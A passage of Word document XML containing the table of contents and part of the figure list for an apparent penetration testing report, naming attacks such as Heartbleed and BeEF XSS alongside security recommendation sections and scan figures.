                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64690408" w14:textId="4A423EA0" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134055" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.4.1 Security Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134055 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BCC9581" w14:textId="723F01F1" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134056" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.5 Attack 5 – Beef XSS Bind Shell Exploitation</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134056 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62902D3C" w14:textId="19701889" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134057" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.5.1 Security Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134057 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5024398D" w14:textId="468D9056" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134058" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.6 Attack 6 – Heartbleed Exploit</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134058 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18C0BF80" w14:textId="56448F82" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134059" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.6.1 Security Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134059 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="357F4CD8" w14:textId="00C275B8" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134060" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.7 MySQL Authentication Bypass Vulnerability</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134060 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FB3CEE9" w14:textId="0A59D2C7" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134061" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2.7.1 Security Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134061 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6015B5AE" w14:textId="26E83943" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134062" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.0 Cost of ‘Black Box’ Penetration Security Test</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134062 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3BE7C9ED" w14:textId="2CFB13DA" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134063" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.0 Timetable of Execution</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134063 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="463A4A49" w14:textId="49CF1C90" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134064" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>9.0 Reflection of ‘Black Box’ Penetration Testing Project</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134064 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4540AD68" w14:textId="0A9DF634" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc40134065" w:history="1">
            <w:r w:rsidR="00F878AE" w:rsidRPr="0065571A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>10.0 References</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc40134065 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidR="00F878AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="277246E6" w14:textId="68FAF1DE" w:rsidR="00F878AE" w:rsidRDefault="00F878AE">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2B9C40FE" w14:textId="77777777" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C40FF" w14:textId="6C924B84" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc40134028"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Figures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="04D4E592" w14:textId="7736FCDE" w:rsidR="00F878AE" w:rsidRDefault="00F878AE">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Figure" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc40134066" w:history="1">
        <w:r w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 1: AWS DynamoDB Lambda Function Call Code Injection [15], [16]</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134066 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7677D6BF" w14:textId="3A87EE52" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134067" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2: Operating System Layers of Abstraction [26]</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134067 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E764CE1" w14:textId="4083F2D2" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134068" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3: Nmap Scan of Target Website Tevel Cyber</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134068 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B70385E" w14:textId="107A4B2D" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134069" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4: Nikto Website Vulnerability Analyses of Target Website Tevel Cyber</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc40134069 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r w:rsidR="00F878AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B2F45E4" w14:textId="48A7F2A8" w:rsidR="00F878AE" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc40134070" w:history="1">
        <w:r w:rsidR="00F878AE" w:rsidRPr="000826E6">
